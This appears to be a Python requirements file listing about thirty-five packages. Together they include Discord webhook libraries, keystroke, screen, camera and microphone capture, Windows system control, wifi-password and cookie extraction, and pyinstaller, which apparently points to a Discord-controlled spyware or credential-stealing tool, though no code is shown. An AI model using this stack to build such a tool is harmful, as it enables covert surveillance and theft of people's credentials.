dhooks
psutil
pycaw
pycryptodome
pynput
pywin32
WMI
discord
discord_webhook
discord-components
discord-py-slash-command
asyncio
pypiwin32
pyautogui
pyinstaller
colorama
opencv-python
comtypes
passax
mss
image
Pillow
requests
wget
win64pyinstaller
pymyfile
maskpass
keyboard
pyotp
pyasn1
sounddevice
scipy
wifipasswords
cookies_package